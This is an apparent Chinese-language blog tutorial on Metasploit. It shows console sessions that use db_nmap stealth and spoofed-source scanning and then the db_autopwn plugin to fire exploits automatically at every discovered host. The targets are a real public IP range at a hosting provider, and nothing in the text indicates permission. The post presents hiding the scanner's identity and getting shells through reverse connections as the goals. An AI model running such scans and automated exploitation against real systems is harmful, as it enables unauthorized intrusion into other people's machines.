查看metasploit数据库连接状态.metasploit4.0以后版本都自动连接自带数据库.所以,象之前那样load db_mysql然后db_connet没有必要了.
[bash]
msf > db_status
[*] postgresql connected to msf3dev
[/bash]
想要查看db_开头的命令,输入db_连按两下tab健,出如下信息.
[bash]
msf > db_
db_connect db_export db_nmap db_status
db_disconnect db_import db_rebuild_cache
[/bash]
当然,使用help命令未尝不可.
[bash]
msf > help
Core Commands
=============
Command Description
——- ———–
? Help menu
back Move back from the current context
banner Display an awesome metasploit banner
cd Change the current working directory
color Toggle color
connect Communicate with a host
exit Exit the console
help Help menu
info Displays information about one or more module
irb Drop into irb scripting mode
jobs Displays and manages jobs
kill Kill a job
load Load a framework plugin
loadpath Searches for and loads modules from a path
makerc Save commands entered since start to a file
popm Pops the latest module off of the module stack and makes it active
previous Sets the previously loaded module as the current module
pushm Pushes the active or list of modules onto the module stack
quit Exit the console
reload_all Reloads all modules from all defined module paths
resource Run the commands stored in a file
route Route traffic through a session
save Saves the active datastores
search Searches module names and descriptions
sessions Dump session listings and display information about sessions
set Sets a variable to a value
setg Sets a global variable to a value
show Displays modules of a given type, or all modules
sleep Do nothing for the specified number of seconds
spool Write console output into a file as well the screen
threads View and manipulate background threads
unload Unload a framework plugin
unset Unsets one or more variables
unsetg Unsets one or more global variables
use Selects a module by name
version Show the framework and console library version numbers
Database Backend Commands
=========================
Command Description
——- ———–
creds List all credentials in the database
db_connect Connect to an existing database
db_disconnect Disconnect from the current database instance
db_export Export a file containing the contents of the database
db_import Import a scan result file (filetype will be auto-detected)
db_nmap Executes nmap and records the output automatically
db_rebuild_cache Rebuilds the database-stored module cache
db_status Show the current database status
hosts List all hosts in the database
loot List all loot in the database
notes List all notes in the database
services List all services in the database
vulns List all vulnerabilities in the database
workspace Switch between database workspaces
msf >
[/bash]
db_nmap用于对主机端口扫描和服务的发现.常用参数如下:
-A : 深层次扫描
-sS : 试图在扫描时隐藏自己. 和 -sI 某ip 这个参数不能同时使用
-sI 某ip: 使用这个”某ip”作为自己扫描时的ip,别人在查看的时候只能发现时这个某ip在扫描他
-oX 文件名 : 把扫描结果导出到 “文件名”文件. 以便于在metasploit中使用db_import来导入这个结果,然后就可以使用db_autopwn来自动入侵拉,对吧
-Pn : 不经过ping . 在扫描之前不使用ping来判断主机是否存活.在longlong ago . ping来判断主机是否存活是可行可靠的.但是自从某牛发现使用
ping可以发起ddos攻击之后,就对ping协议进行了改进和预防.所以,有时候ping不到主机并不代表主机down. 你懂得.
对了还有一个重要的参数:
-v :显示扫描进度. 否则你会以为nmap死掉了,而不耐烦把它ctrl – c掉..
那么, 一个常用的扫描命令例子:
[bash]
msf > nmap -sS -A -Pn -v -oX ieroot 108.171.217.0/24
[*] exec: nmap -sS -A -Pn -v -oX ieroot 108.171.217.0/24
Starting Nmap 5.51SVN ( http://nmap.org ) at 2012-09-29 19:27 CST
NSE: Loaded 61 scripts for scanning.
Initiating Parallel DNS resolution of 256 hosts. at 19:27
Completed Parallel DNS resolution of 256 hosts. at 19:27, 2.24s elapsed
Initiating SYN Stealth Scan at 19:27
Scanning 64 hosts [1000 ports/host]
Discovered open port 53/tcp on 108.171.217.50
SYN Stealth Scan Timing: About 1.06% done; ETC: 20:15 (0:48:02 remaining)
Discovered open port 53/tcp on 108.171.217.54
Discovered open port 443/tcp on 108.171.217.50
Discovered open port 53/tcp on 108.171.217.53
Discovered open port 53/tcp on 108.171.217.51
Discovered open port 80/tcp on 108.171.217.18
Discovered open port 443/tcp on 108.171.217.54
Discovered open port 443/tcp on 108.171.217.30
Discovered open port 80/tcp on 108.171.217.35
Discovered open port 53/tcp on 108.171.217.52
Discovered open port 80/tcp on 108.171.217.54
Discovered open port 443/tcp on 108.171.217.51
Discovered open port 80/tcp on 108.171.217.30
Discovered open port 80/tcp on 108.171.217.50
Discovered open port 80/tcp on 108.171.217.51
#省略一大块
[/bash]
然后就是
db_import ieroot
ieroot文件是上面nmap扫描的结果嘛.
然后就是:
load db_autopwn
db_autopwn来自动扫描可利用主机了.
db_autopwn的几个常用参数来说明一下:
-e : 对数据库中扫描结果中的每一个主机都发起攻击
-t : 显示所有匹配的模块
-r : 使用reverse连接,反向连接. 反向连接有好处阿. 穿防火墙就用这个参数了
-x : 根据漏洞来选择攻击模块
-p : 根据端口选择攻击模块. 有很多主机把自己的服务的端口改的一塌糊涂.这个时候用-p要慎重哦
所以.过程如下:
[bash]
msf > nmap -sS -A -Pn -v -oX ieroot 108.171.217.51
[*] exec: nmap -sS -A -Pn -v -oX ieroot 108.171.217.51
Starting Nmap 5.51SVN ( http://nmap.org ) at 2012-09-29 19:35 CST
NSE: Loaded 61 scripts for scanning.
Initiating Parallel DNS resolution of 1 host. at 19:35
Completed Parallel DNS resolution of 1 host. at 19:35, 0.00s elapsed
Initiating SYN Stealth Scan at 19:35
Scanning 108-171-217-51.static.webnx.com (108.171.217.51) [1000 ports]
Completed SYN Stealth Scan at 19:36, 17.18s elapsed (1000 total ports)
Initiating Service scan at 19:36
Initiating OS detection (try #1) against 108-171-217-51.static.webnx.com (108.171.217.51)
Initiating Traceroute at 19:36
Completed Traceroute at 19:36, 3.03s elapsed
Initiating Parallel DNS resolution of 19 hosts. at 19:36
Completed Parallel DNS resolution of 19 hosts. at 19:36, 13.00s elapsed
NSE: Script scanning 108.171.217.51.
Initiating NSE at 19:36
Completed NSE at 19:36, 10.00s elapsed
Nmap scan report for 108-171-217-51.static.webnx.com (108.171.217.51)
Host is up (0.28s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
21/tcp closed ftp
80/tcp closed http
8888/tcp closed sun-answerbook
Too many fingerprints match this host to give specific OS details
Network Distance: 20 hops
TRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 0.76 ms 121.250.211.1
2 …
3 48.77 ms 202.194.0.125
4 0.62 ms 202.194.0.45
5 0.89 ms 58.194.164.174
6 1.70 ms 222.173.20.205
7 1.63 ms 60.235.2.77
8 11.68 ms 60.235.0.73
9 10.23 ms 202.97.42.174
10 23.02 ms 202.97.40.9
11 21.08 ms 202.97.33.30
12 21.44 ms 202.97.33.190
13 155.27 ms 202.97.50.122
14 324.65 ms 202.97.49.158
15 315.15 ms 10gigabitethernet6-1.core1.lax1.he.net (64.71.131.133)
16 320.71 ms 10gigabitethernet1-3.core1.lax2.he.net (72.52.92.122)
17 314.85 ms 216.218.213.250
18 320.26 ms 100-42-223-146.static.webnx.com (100.42.223.146)
19 299.95 ms 100-42-223-198.static.webnx.com (100.42.223.198)
20 309.17 ms 108-171-217-51.static.webnx.com (108.171.217.51)
Read data files from: /opt/metasploit/common/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 45.88 seconds
Raw packets sent: 2059 (92.876KB) | Rcvd: 33 (1.688KB)
msf > hosts
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
——- — —- ——- ——— —– ——- —- ——–
msf > db_import ieroot
[*] Importing ‘Nmap XML’ data
[*] Import: Parsing with ‘Rex::Parser::NmapXMLStreamParser’
[*] Importing host 108.171.217.51
[*] Successfully imported /root/ieroot
msf > hosts
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
——- — —- ——- ——— —– ——- —- ——–
108.171.217.51 108-171-217-51.static.webnx.com Sun Solaris 9 device
msf >
[/bash]
[bash]
msf > load db_autopwn
[*] Successfully loaded plugin: db_autopwn
msf > db_autopwn -e -p -t
[-] The db_autopwn command is DEPRECATED
[-] See http://r-7.co/xY65Zr instead
[-]
[-] Warning: The db_autopwn command is not officially supported and exists only in a branch.
[-] This code is not well maintained, crashes systems, and crashes itself.
[-] Use only if you understand it’s current limitations/issues.
[-] Minimal support and development via neinwechter on GitHub metasploit fork.
[-]
[*] Analysis completed in 44 seconds (0 vulns / 0 refs)
[*]
[*] ================================================================================
[*] Matching Exploit Modules
[*] ================================================================================
[*] ================================================================================
[*]
[*]
[*] The autopwn command has completed with 0 sessions
msf > sessions -l
Active sessions
===============
No active sessions.
msf > hosts -d
Hosts
=====
address mac name os_name os_flavor os_sp purpose info comments
——- — —- ——- ——— —– ——- —- ——–
108.171.217.51 108-171-217-51.static.webnx.com Sun Solaris 9 device
[*] Deleted 1 hosts
msf >
[/bash]
session不容易得到阿. 如果得到就使用 session -i 1 来连接第一个session. 其他依次. 得到shell就没有什么好说得了.